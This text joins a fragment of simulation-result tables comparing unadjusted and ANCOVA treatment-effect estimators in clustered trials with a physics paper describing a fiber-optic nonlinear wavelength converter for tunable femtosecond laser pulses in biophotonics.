& 0.327 & 0.065 & 0.080 & 0.548 & 0.547 \\ \hline Scenario II & UN & -0.011 & 0.206 & 0.233 & 0.273 & 0.223 & 0.969 & 0.911 \\ & AN I & -0.007 & 0.122 & 0.170 & 0.179 & 0.150 & 0.920 & 0.873 \\ & AN II & -0.014 & 0.190 & 0.225 & 0.193 & 0.165 & 0.824 & 0.781 \\ & AN III & 0.003 & 0.109 & 0.161 & 0.129 & 0.107 & 0.867 & 0.793 \\ & AN IV & 0.008 & 0.346 & 0.366 & 0.064 & 0.077 & 0.380 & 0.378 \\ \hline Scenario III & UN & -0.005 & 0.165 & 0.196 & 0.226 & 0.184 & 0.958 & 0.913 \\ & AN I & -0.001 & 0.107 & 0.147 & 0.178 & 0.146 & 0.961 & 0.934 \\ & AN II & -0.014 & 0.137 & 0.170 & 0.171 & 0.143 & 0.926 & 0.895 \\ & AN III & 0.017 & 0.097 & 0.140 & 0.135 & 0.111 & 0.921 & 0.868 \\ & AN IV & 0.017 & 0.401 & 0.410 & 0.092 & 0.098 & 0.619 & 0.569 \\ \hline Scenario IV & UN & -0.024 & 0.162 & 0.183 & 0.208 & 0.169 & 0.969 & 0.933 \\ & AN I & -0.017 & 0.102 & 0.138 & 0.147 & 0.121 & 0.978 & 0.937 \\ & AN II & -0.036 & 0.133 & 0.161 & 0.144 & 0.121 & 0.919 & 0.871 \\ & AN III & 0.007 & 0.091 & 0.131 & 0.088 & 0.074 & 0.756 & 0.696 \\ & AN IV & 0.034 & 0.317 & 0.325 & 0.055 & 0.077 & 0.450 & 0.476 \\ \hline \hline \end{tabular} \end{table} Table A11: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.140 & 0.163 & 0.193 & 0.158 & 0.967 & 0.924 \\ & AN I & -0.002 & 0.079 & 0.113 & 0.142 & 0.116 & 0.977 & 0.931 \\ & AN II & -0.007 & 0.098 & 0.126 & 0.131 & 0.109 & 0.934 & 0.894 \\ & AN III & -0.001 & 0.074 & 0.110 & 0.106 & 0.087 & 0.911 & 0.847 \\ & AN IV & -0.009 & 0.232 & 0.240 & 0.070 & 0.077 & 0.642 & 0.615 \\ \hline Scenario II & UN & -0.015 & 0.192 & 0.213 & 0.248 & 0.202 & 0.957 & 0.906 \\ & AN I & -0.008 & 0.098 & 0.139 & 0.157 & 0.131 & 0.947 & 0.903 \\ & AN II & -0.016 & 0.145 & 0.174 & 0.161 & 0.139 & 0.864 & 0.824 \\ & AN III & 0.003 & 0.115 & 0.153 & 0.136 & 0.113 & 0.886 & 0.827 \\ & AN IV & 0.008 & 0.242 & 0.260 & 0.069 & 0.072 & 0.528 & 0.502 \\ \hline Scenario III & UN & -0.010 & 0.165 & 0.195 & 0.222 & 0.181 & 0.956 & 0.903 \\ & AN I & -0.003 & 0.103 & 0.143 & 0.174 & 0.143 & 0.972 & 0.939 \\ & AN II & -0.020 & 0.133 & 0.165 & 0.166 & 0.139 & 0.930 & 0.890 \\ & AN III & 0.016 & 0.095 & 0.136 & 0.134 & 0.110 & 0.924 & 0.881 \\ & AN IV & 0.020 & 0.403 & 0.411 & 0.090 & 0.091 & 0.636 & 0.582 \\ \hline Scenario IV & UN & -0.168 & 0.155 & 0.176 & 0.202 & 0.165 & 0.969 & 0.929 \\ & AN I & -0.160 & 0.088 & 0.126 & 0.143 & 0.118 & 0.988 & 0.961 \\ & AN II & -0.255 & 0.123 & 0.150 & 0.140 & 0.118 & 0.938 & 0.888 \\ & AN III & -0.096 & 0.076 & 0.119 & 0.088 & 0.073 & 0.792 & 0.731 \\ & AN IV & 0.093 & 0.232 & 0.245 & 0.060 & 0.072 & 0.537 & 0.526 \\ \hline \hline \end{tabular} \end{table} Table 12: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.138 & 0.161 & 0.194 & 0.158 & 0.968 & 0.929 \\ & AN I & -0.001 & 0.078 & 0.113 & 0.143 & 0.117 & 0.978 & 0.943 \\ & AN II & -0.007 & 0.095 & 0.125 & 0.133 & 0.111 & 0.936 & 0.906 \\ & AN III & -0.001 & 0.073 & 0.110 & 0.107 & 0.088 & 0.919 & 0.854 \\ & AN IV & -0.010 & 0.230 & 0.239 & 0.071 & 0.076 & 0.653 & 0.624 \\ \hline Scenario II & UN & -0.007 & 0.188 & 0.210 & 0.247 & 0.202 & 0.960 & 0.913 \\ & AN I & 0.002 & 0.094 & 0.136 & 0.158 & 0.132 & 0.951 & 0.909 \\ & AN II & 0.005 & 0.142 & 0.173 & 0.163 & 0.140 & 0.882 & 0.826 \\ & AN III & 0.003 & 0.110 & 0.148 & 0.137 & 0.113 & 0.900 & 0.840 \\ & AN IV & 0.010 & 0.241 & 0.258 & 0.070 & 0.072 & 0.551 & 0.526 \\ \hline Scenario III & UN & 0.015 & 0.162 & 0.192 & 0.224 & 0.183 & 0.964 & 0.910 \\ & AN I & 0.023 & 0.102 & 0.140 & 0.176 & 0.145 & 0.972 & 0.940 \\ & AN II & 0.033 & 0.129 & 0.162 & 0.169 & 0.141 & 0.935 & 0.886 \\ & AN III & 0.020 & 0.093 & 0.133 & 0.135 & 0.111 & 0.936 & 0.884 \\ & AN IV & 0.027 & 0.359 & 0.370 & 0.091 & 0.092 & 0.648 & 0.599 \\ \hline Scenario IV & UN & 0.078 & 0.151 & 0.174 & 0.205 & 0.167 & 0.976 & 0.945 \\ & AN I & 0.073 & 0.087 & 0.127 & 0.145 & 0.120 & 0.987 & 0.949 \\ & AN II & 0.091 & 0.117 & 0.150 & 0.143 & 0.120 & 0.936 & 0.894 \\ & AN III & 0.074 & 0.077 & 0.120 & 0.089 & 0.074 & 0.796 & 0.743 \\ & AN IV & 0.098 & 0.225 & 0.239 & 0.061 & 0.070 & 0.527 & 0.537 \\ \hline \hline \end{tabular} \end{table} Table 13: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. #### Web Appendix A.4.2.2 When the number of clusters \(I=60\) Table A14: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.076 & 0.085 & 0.102 & 0.097 & 0.980 & 0.971 \\ & AN I & -0.002 & 0.042 & 0.058 & 0.077 & 0.073 & 0.984 & 0.979 \\ & AN II & -0.003 & 0.049 & 0.063 & 0.079 & 0.075 & 0.984 & 0.977 \\ & AN III & -0.002 & 0.040 & 0.057 & 0.060 & 0.057 & 0.951 & 0.946 \\ & AN IV & -0.005 & 0.042 & 0.058 & 0.054 & 0.052 & 0.927 & 0.915 \\ \hline Scenario II & UN & -0.004 & 0.103 & 0.117 & 0.127 & 0.121 & 0.964 & 0.947 \\ & AN I & -0.001 & 0.051 & 0.075 & 0.085 & 0.081 & 0.971 & 0.962 \\ & AN II & -0.002 & 0.073 & 0.090 & 0.095 & 0.092 & 0.956 & 0.947 \\ & AN III & 0.003 & 0.060 & 0.082 & 0.077 & 0.073 & 0.921 & 0.911 \\ & AN IV & 0.004 & 0.042 & 0.068 & 0.053 & 0.051 & 0.864 & 0.840 \\ \hline Scenario III & UN & -0.006 & 0.094 & 0.110 & 0.117 & 0.111 & 0.956 & 0.944 \\ & AN I & -0.001 & 0.057 & 0.079 & 0.093 & 0.088 & 0.978 & 0.971 \\ & AN II & -0.007 & 0.069 & 0.088 & 0.096 & 0.092 & 0.963 & 0.947 \\ & AN III & 0.005 & 0.053 & 0.077 & 0.074 & 0.070 & 0.940 & 0.919 \\ & AN IV & 0.011 & 0.057 & 0.080 & 0.067 & 0.064 & 0.896 & 0.884 \\ \hline Scenario IV & UN & -0.001 & 0.083 & 0.092 & 0.106 & 0.101 & 0.973 & 0.967 \\ & AN I & -0.001 & 0.047 & 0.064 & 0.078 & 0.074 & 0.988 & 0.983 \\ & AN II & -0.005 & 0.061 & 0.074 & 0.083 & 0.080 & 0.972 & 0.962 \\ & AN III & 0.006 & 0.042 & 0.061 & 0.052 & 0.049 & 0.834 & 0.814 \\ & AN IV & 0.012 & 0.044 & 0.062 & 0.047 & 0.045 & 0.783 & 0.769 \\ \hline \hline \end{tabular} \end{table} Table 15: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.074 & 0.084 & 0.101 & 0.096 & 0.984 & 0.973 \\ & AN I & -0.002 & 0.041 & 0.057 & 0.077 & 0.073 & 0.986 & 0.979 \\ & AN II & -0.003 & 0.048 & 0.062 & 0.078 & 0.075 & 0.985 & 0.978 \\ & AN III & -0.002 & 0.039 & 0.056 & 0.060 & 0.057 & 0.950 & 0.948 \\ & AN IV & -0.004 & 0.041 & 0.058 & 0.054 & 0.052 & 0.933 & 0.918 \\ \hline Scenario II & UN & -0.002 & 0.101 & 0.115 & 0.126 & 0.120 & 0.954 & 0.944 \\ & AN I & 0.003 & 0.050 & 0.073 & 0.084 & 0.080 & 0.974 & 0.966 \\ & AN II & 0.004 & 0.073 & 0.089 & 0.095 & 0.092 & 0.953 & 0.947 \\ & AN III & 0.002 & 0.058 & 0.080 & 0.076 & 0.072 & 0.928 & 0.918 \\ & AN IV & 0.004 & 0.041 & 0.067 & 0.053 & 0.051 & 0.874 & 0.859 \\ \hline Scenario III & UN & -0.001 & 0.093 & 0.109 & 0.116 & 0.110 & 0.957 & 0.942 \\ & AN I & 0.006 & 0.056 & 0.078 & 0.092 & 0.088 & 0.983 & 0.972 \\ & AN II & 0.007 & 0.068 & 0.087 & 0.096 & 0.092 & 0.968 & 0.961 \\ & AN III & 0.007 & 0.052 & 0.076 & 0.074 & 0.070 & 0.941 & 0.924 \\ & AN IV & 0.014 & 0.055 & 0.078 & 0.067 & 0.064 & 0.905 & 0.891 \\ \hline Scenario IV & UN & 0.006 & 0.083 & 0.092 & 0.106 & 0.101 & 0.970 & 0.963 \\ & AN I & 0.007 & 0.048 & 0.064 & 0.079 & 0.075 & 0.984 & 0.977 \\ & AN II & 0.008 & 0.061 & 0.074 & 0.084 & 0.080 & 0.967 & 0.962 \\ & AN III & 0.008 & 0.042 & 0.061 & 0.052 & 0.049 & 0.833 & 0.815 \\ & AN IV & 0.014 & 0.044 & 0.062 & 0.048 & 0.045 & 0.791 & 0.781 \\ \hline \hline \end{tabular} \end{table} Table 16: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. Figure A3: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=60\). Figure A4: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=18\). Web Appendix A4.3 Data Application: Additional Results Adjusting for Cluster-Period Size as an Additional Covariate
2305.08266
Fiber-optic nonlinear wavelength converter for adaptive femtosecond biophotonics
Broad and safe access to ultrafast laser technology has been hindered by the absence of optical fiber-delivered pulses with tunable central wavelength, pulse repetition rate, and pulse width in the picosecond-femtosecond regime. To address this long-standing obstacle, we developed a reliable accessory for femtosecond ytterbium fiber chirped pulse amplifiers, termed as fiber-optic nonlinear wavelength converter (FNWC), as an adaptive optical source for the emergent field of femtosecond biophotonics. This accessory embowers the fixed-wavelength laser to produce fiber delivered ~20 nJ pulses with central wavelength across 950-1150 nm, repetition rate across 1-10 MHz, and pulse width across 40-400 fs, with a long-term stability of >2000 hrs. As a prototypical label-free application in biology and medicine, we demonstrate the utility of FNWC in real-time intravital imaging synergistically integrated with modern machine learning and large-scale fluorescence lifetime imaging microscopy.
Geng Wang, Jindou Shi, Rishyashring R. Iyer, Janet E. Sorrells, Haohua Tu
2023-05-14T22:11:00Z
http://arxiv.org/abs/2305.08266v2
# Fiber-optic nonlinear wavelength converter for adaptive femtosecond biophotonics ###### Abstract We develop a tunable and reliable accessory for femtosecond ytterbium fiber chirped pulse amplifiers, termed as fiber-optic nonlinear wavelength converter (FNWC), as an adaptive optical source for femtosecond biophotonics. This accessory embowers the laser to produce fiber delivered \(\sim\)20 nJ pulses with central wavelength across 950-1150 nm, repetition rate across 1-10 MHz, and pulse width across 40-400 fs. The key enabling feature is the surprising suppression of the long-term fiber photodamage in coherent supercontinuum generation using a photonic crystal fiber with large-pitch small-hole lattice. The corresponding integrated laser may widen the access to tunable ultrafast laser technology in biology and medicine. Beckman Institute for Advanced Science and Technology, University of Illinois at Urbana-Champaign, Urbana, IL 61801, USA Department of Electrical and Computer Engineering, University of Illinois at Urbana-Champaign, Urbana, IL 61801, USA *[email protected]_ ## 1 Laser source engineering for femtosecond biophotonics Ultrafast laser engineering has produced mode-locked optical pulses with (sub-)picosecond duration (\(\tau\)) at a MHz-level repetition rate (\(f\)) [1] and driven the emergent field of femtosecond biophotonics [2]. These ultrashort pulses were first produced six years after the invention of laser [3]. Subsequently, the Ti:sapphire crystal was recognized as a better lasing medium than dye solutions to support a broad range of near-infrared wavelengths (\(\dot{\lambda}\)) [4]. The revolutionary development of Kerr lens mode-locking in 1990 [5] led to the commercialization of high average power (\(P\)) Ti:sapphire lasers tunable across 690-1020 nm. More recent innovation around 2010 resulted in an ytterbium-based optical parametric oscillator (OPO) with one output widely tunable across 680-1300 nm and another synergistic output fixed at \(\sim\)1040 nm [6]. Today, automatic wavelength tuning, beam pointing correction, and dispersion compensation have enabled many aspects of femtosecond biophotonics, including biological microscopy or clinical imaging [7], nanosurgery [8], and optogenetics [9]. However, despite decades of development in solid-state ultrafast source, it remains technically challenging to tune the three pulse parameters of \(\dot{\lambda}\),\(f\), and \(\tau\) independently and widely with sufficient output \(P\) or pulse energy (\(E\)). In particular, the typical inability to vary \(f\) not only limits the solid-state ultrafast lasers themselves, but also the subsequent wavelength-tuning accessories of optical parametric amplifier (OPA). In contrast to the solid-state lasers, ultrafast fiber lasers have played a relatively minor role in femtosecond biophotonics despite its rapid advances [10], largely due to the difficulty to tune \(\dot{\lambda}\) (and to a less degree, \(\tau\) toward shorter durations). The fiber chirped pulse amplification (FCPA) [11] of a pulse-picked seed along a large-core ytterbium (Yb) gain fiber, which could be either a conventional circular fiber or a largely single-mode photonic crystal fiber such as DC-200/40-PZ-Yb (NKT photonics) [12], has led to various commercial FCPA lasers (Table S1) useful for LASIK eye surgery and material processing. These pulse-picked FCPA (pp-FCPA) lasers are advantageous over the solid-state lasers due to the ease to vary \(f\) at the same \(P\), i.e., pre-amplification pulse picking for variable \(E\). It seems that pairing one pp-FCPA laser with an OPA accessory would empower the tuning of \(\dot{\lambda}\) and \(\tau\) (Table S1) to compete favorably with the solid-state lasers. However, the OPA is a largely free-space add-on that diminishes the fiber-optic advantages of the pp-FCPA laser, e.g., high resistance to environmental disturbance and good beam quality ensured by single-mode fiber propagation. Also, routine operation and maintenance of an integrated FCPA-OPA laser is often beyond the expertise of a life scientist. Thus, the tuning accessory based on OPA technology has limited the application of the otherwise attractive pp-FCPA lasers to compete with their solid-state counterparts. To overcome these OPA-related limitations, we aim to develop an alternative tuning accessory based on the seeding subunit of OPA technology [13], known as supercontinuum (or white-light) generation. ## 2 High peak-power coherent fiber supercontinuum generation Bulk-medium supercontinuum generation was demonstrated in glasses using ps pulses [14]. Later, fs pulses were more useful in the seed generation of commercial OPA operated at 0.25 MHz [15] (Table S2), which also enabled the commercial OPA accessories of the pp-FCPA lasers toward larger \(f\) of \(\sim\)4 MHz (Table S1). Interestingly, photonic crystal fiber-based supercontinuum generation was first demonstrated using fs pulses [16], but ps pulses gained commercial success later due to its robust all-fiber setup [17] (Fig. 1a, Approach 1; Table S2). The success of this ps approach in wide spectral broadening has largely restricted the fs approach to an add-on nonlinear wavelength converter for a solid-state Ti:sapphire oscillator (Fig. 1a, Approach 2). A third approach has diverged from either the all-fiber supercontinuum generation or the solid-state laser, and instead focused on coherent fiber supercontinuum generation [18] by a fs Yb:fiber laser free of the pulse picking and a bare fiber several cm in length [19-21] (Fig. 1a, Approach 3). Despite these progresses, the corresponding nonlinear fibers have a relatively small core (\(<\)12 \(\upmu\)m) and do not support high-peak power coherent fiber supercontinuum generation by the pp-FCPA lasers (Table S1). In this context, our recent attempt using a pp-FCPA laser (Satsuma, Amplitude) and a large-core (15 \(\upmu\)m) photonic crystal fiber (LMA-PM-15, NKT Photonics) [22] put us in a position to develop the alternative tuning accessory (Table S2). Unfortunately, we found that the corresponding supercontinuum generating fiber inevitably suffered irreversible photodamage after \(\sim\)100-hr of accumulative operation. This disruption prohibits the operation of the corresponding supercontinuum laser by a life scientist (without extensive laser training). It is thus important to identify the nature of this long-term photodamage and then avoid it. We aimed to answer whether this photodamage was caused by airborne contaminant in a non-clean-room environment and/or high peak-intensity free-space coupling at two fiber end facets, which could be avoided by commercial photonic crystal fiber end-capping/termination with specific hole collapsing and beam expansion [23] (Fig. 1a, Approach 2), or other more complicated mechanisms. ## 3 Experiment on two schemes of fiber supercontinuum Our custom-built coherent fiber supercontinuum source (Fig. 1a, Approach 3; Table S3, Scheme 1) enabled slide-free histochemistry [22], nonlinear optogenetics [24], and label-free imaging of extracellular vesicles [25]. The supercontinuum output along one principal axis of polarization-maintaining (PM) LMA-PM-15 fiber with a high polarization extinction ratio (PER) reproducibly exhibited the same spectrum (Fig. 1b, Scheme 1) for different cleaved 25-cm fiber pieces (Table S3), as asserted by a deterministic model [26] taking account of polarization effect [27]. However, each piece encountered a long-term photodamage after accumulative operation of 100\(\pm\)40 hr, resulting in gradually reduced (up to 10%) coupling efficiency not compensable by optical realignment along with narrowed spectral broadening and often degraded output beam quality. We observed this fiber photodamage in another polarized supercontinuum source [28], except for the use of a non-FCPA operated at 40 MHz as the master laser (Table S3, Scheme 2). Although Scheme 2 matched Scheme 1 in input peak intensity (Table S3), the resulting supercontinuum produced a broader spectrum due to the lower dispersion of the fiber (Fig. 1b, bottom). However, photodamage with gradually reduced coupling efficiency was found to occur in a shorter timeframe of 10\(\pm\)2 hr (Table S3), so that Figure 1: (a) Three general approaches for fiber supercontinuum generation: all-fiber splice often used in commercial supercontinuum lasers (Approach 1), commercial enclosed device with fiber capping and mode expansion as an ad-on nonlinear wavelength converter for a Ti:sapphire oscillator (Approach 2), and mounted bare (polarization-maintaining) fiber for coherent fiber supercontinuum generation by a fs Yb:fiber laser (Approach 3). PP-FCPA – pulse-picked fiber chirped pulse amplifier, BB – beam blocker, HWP – halfwave plate, PBS – polarizing beam splitter, M – mirror, FL – focusing lens, PCF – photonic crystal fiber, CL – collimating lens; (b) three schemes of polarized coherent fiber supercontinuum generation under study with wavelength-dependent dispersion of photonic crystal fibers indicative of the restriction of supercontinuum generation to fiber normal dispersion regimes (top) with cross-sectional image of photonic crystal fibers indicative of pitch and hole sizes (inset), and corresponding spectra of supercontinuum outputs (bottom); (c) Output spectra at different \(f\) but the same \(E\) for Scheme 3 (top) in comparison with input spectra of source laser (inset), and output spectra at different \(E\) but the same \(f\) for Scheme 3 (bottom) with cross sectional images of the supercontinuum generating fiber (inset). the stain-free histopathology had to replace the fiber daily to obtain reproduceable results [29]. This photodamage required replacement of the fiber with tedious optical realignments and thus limited the femtosecond biophotonic application of both schemes of supercontinuum source. We identified one key difference between the two schemes. The photodamage in Scheme 2 was localized within 1-cm beyond the entrance end of the fiber, as re-cleaving of this length for a damaged 25-cm fiber piece would recover the fiber coupling efficiency and supercontinuum bandwidth. In contrast, the photodamage in Scheme 1 was relatively delocalized, as re-cleaving up to 10-cm length beyond the entrance end of a damaged 25-cm fiber piece was needed to recover the fiber coupling efficiency. The observed localization of fiber photodamage and reduced coupling efficiency over time are inconsistent with airborne contamination in a non-clean-room environment and/or high peak-intensity free-space coupling. The former would lead to rather sudden or random reduction of the coupling efficiency while the latter spatiotemporally similar photodamage for the two schemes. Thus, it is unlikely to mitigate the photodamage by specific fiber end-capping with mode expansion (Fig. 1a, Approach 2). ## 4 Test on a third scheme of fiber supercontinuum The observed photodamage in Scheme 2 supports the interpretation based on the emergence of a photoscattering waveguide at the fiber entrance end [30, 31] in the form of long-period fiber grating (LPFG) [32]. In this interpretation, input pulse propagating in the core mode beats with the copropagating pulse in a cladding mode after free-space-to-fiber coupling to produce the standing wave that writes and progressively strengthens a long-period fiber grating (LPFG). The period (\(\Lambda\)) of this LPFG is determined by the phase matching of \(\Lambda=\lambda(n_{\mathrm{co}}(\lambda)-n_{\mathrm{cl}}(\lambda))\), where \(\lambda\) is the central wavelength of the pulses while \(n_{\mathrm{co}}(\lambda)\) and \(n_{\mathrm{cl}}(\lambda)\) are the corresponding effective refractive index of the core mode and cladding mode, respectively. The pulses have broad bandwidths (\(\sim\)10 nm for 280 fs input and larger along the fiber for the core mode due to supercontinuum generation) from which the blue and red edges write slightly different grating periods and lead to the localized LPFG formation at the entrance end (because the superposition of the gratings from different wavelengths can be in phase for a limited length). The temporal walk-off between two pulses may also contribute to this localized LPFG formation. For a given \(\lambda\), the period \(\Lambda\) of a circular fiber can be calculated from the dielectric structure of fiber cross section [32]. Similarly, \(\Lambda\) of a photonic crystal fiber can be calculated from the pitch and hole sizes of fiber cross section (Fig. 1b, Inset) for the two schemes (Table S3), if \(n_{\mathrm{cl}}(\lambda)\) approximates the effective refractive index of the fundamental space filling mode [33]. The much larger \(\Lambda\) in Scheme 1 as opposed to Scheme 2 is thus responsible for more delocalized fiber photodamage to approach similar LPFG strength (with dozens of periods) or loss of fiber coupling efficiency (10%), and slower LPFG formation via increased spectral broadening (supercontinuum generation) and/or pulse walk-off at longer fiber lengths. As a nontrivial prediction from this interpretation, the LPFG-based photodamage would disappear if the calculated \(\Lambda\) approaches the total length of the supercontinuum-generating fiber (because the LPFG would function poorly with only one period). To test this prediction, we developed a third scheme of supercontinuum generation using an ultra-large core silica photonic crystal fiber (LMA-PM-40-FUD, NKT Photonics) that approximates the doped DC-200/40-PZ-Yb fiber in a PP-FCPA laser [12], with a cross section of large-pitch small-hole lattice (Table S3, Scheme 3). The selection of a short fiber length (9.0 cm) not only avoided undesirable bending effect [34] or depolarization effect [27], but also approached the calculated \(\Lambda\) from this fiber (Table S3). Without the fiber end-capping (Fig. 1a, Approach 2), the resulting supercontinuum source (Fig. 1b, Scheme 3) remained stable after \(>\)2000 hours of accumulative operation within 2 years in a regular (non-clean-room) optical laboratory. This test validates our LPFG-based interpretation of fiber photodamage. Besides the suppression of the LPFG photodamage, the large core size (40 um) also scales up the peak power for tunable pulse generation (see below), just like that for non-dissipative [34] and dissipative soliton pulses [35]. ## 5 Fiber-optic nonlinear wavelength converter We next examined the dependence of supercontinuum spectrum (Table S3, Scheme 3) on \(f\) of the master PP-FCPA laser at the same \(E\) (i.e., _P/f_). The laser/input spectrum and _tau_ was rather independent on \(f\), so that the supercontinuum output retained similar spectrum across wide \(f\) range of 2-10 MHz (Fig. 1c, top). This deterministic generation of coherent fiber supercontinuum is not surprising because the spectrum can be theoretically predicted if the spatiotemporal property of input laser pulse is known [26]. Similar _f_-independent spectra were obtained at lower \(E\), so that the leftmost and rightmost spectral lobes may be filtered to generate compressed pulses [21] across 950-1110 nm, wherein they converge at 1030 nm (Fig. 1c, bottom). The observed _f_-independent supercontinuum generation resembles that of soliton generation [36]. Experimentally, collimated fiber supercontinuum output was aligned along the horizontal polarization by an achromatic half-wave plate to enter a pulse dispersion compensation unit (Fig. 2a) in the form of programmable pulse shaper (FemtoJock, Biophotonic Solutions), which was empowered by multiphoton intrapulse interference phase scan (MIIPS) [37] through a 128-pixel spatial light modulator (SLM) [38]. The pulse shaper spectrally selected a fixed-bandwidth window (\(\sim\)60 nm) inside the supercontinuum spectrum with a tunable central wavelength across 950-1110 nm after motorized rotation of the reflective grating of the pulse shaper to project this spectral window on the SLM [39]. For a pulse centered at \(\lambda=1030\) nm without the spectral lobe filtering or at a detuned \(\lambda\) (e.g., 1110 nm) with this filtering [21], the pulse shaper allowed compressing this pulse close to its transform limit _tau_ (\(\sim\)60-fs FWHM or \(\sim\)40-fs sech\({}^{2}\)-shape) [37, 39] and chirping/tuning the pulse to \(\sim\)400 fs (Fig. 2b). Optionally, the free-space output from the pulse shaper was recoupled into a 1-m low-dispersion Kagome hollow-core fiber patch cable (PMC-C-Yb-7C, GLOphotonics) by an achromatic lens of 75-mm focal length, with slightly \(\lambda\)-dependent efficiency of 76\(\pm\)3%. The weak birefringence intrinsic to the hollow-core fiber [40] allowed rotating the input polarization by a half-wave plate to maximize the PER of fiber-delivered output to 10-20, depending on the bending state of the fiber. The spectrum and spatial beam profile of fiber-delivered output after the collimation by an achromatic lens (75-mm focal length) approximated those of the free-space input before the fiber, while the small pulse duration of free-space input was largely retained (Fig. 2b). At the cost of 24% lower \(P\) or \(E\) and slightly degraded PER, the fiber pulse delivery gains several advantages over free-space pulse delivery: i) simple fiber telecommunication connection and disconnection allows easy switching among different optical fiber-coupled application modules, i.e. sharing the fiber delivered output among these modules (Fig. 2a); ii) fiber delivery of energetic pulses is safer than free-space delivery for operators without extensive laser training; iii) the optimal fiber recoupling condition of endless single-mode fiber supercontinuum [41, 42] is independent on \(\lambda\) (i.e. rotation of the grating in the pulse shaper), which can be useful to monitor and correct the misalignment of the pulse shaper itself [38] in portable application of this tunable source (beyond an environmentally controlled laboratory). Figure 2: (a) Schematics of fiber-optic nonlinear wavelength converter (FNWC) and related optical components for femtosecond biophotonics switchable between different applications by fiber-optic telecommunication connection and disconnection. PP-FCPA – pulse-picked fiber chirped pulse amplifier, BB – beam blocker, M – mirror, HWP – halfwave plate, PBS – polarizing beam splitter, FL – focusing lens, CL – collimating lens; (b) FNWC output spectrum (1030-nm central wavelength without filtering the supercontinuum), pulse width, spatial mode/profile, and full width at half maximum (FWHM) pulse width versus group delay dispersion (GDD) position before and after 1-m Kagome hollow-core fiber (left), in compassion to FNWC output spectrum (1110-nm central wavelength from filtered supercontinuum), pulse width, spatial mode/profile, and FWHM pulse width versus GDD position before and after 1-m Kagome hollow-core fiber (right). The SLM-based pulse shaper is not necessary for the tunable fiber supercontinuum source with or without hollow-core fiber delivery when only tunable-\(\tau\) pulse generation (rather than arbitrary pulse shaping [39]) is needed. We tested a more cost-effective alternate of single-prism pulse compressor (BOA-1050, Swamp Optics) and generated similar tunable-\(\lambda\)\(\sim\)40-fs (sech\({}^{2}\)) pulse by motorized rotation of the prism and the linear motion of a back retroreflector that varies group delay dispersion (GDD) (Table S4), indicating that the chirp of this fixed-bandwidth pulse is largely linear. Due to the fiber input (supercontinuum generation) and optional fiber output (dispersion-free pulse transmission through the hollow-core fiber) of the dispersion compensation unit, we term the whole device a fiber-optic nonlinear wavelength converter (FNWC) (Fig. 2a, Table S4). 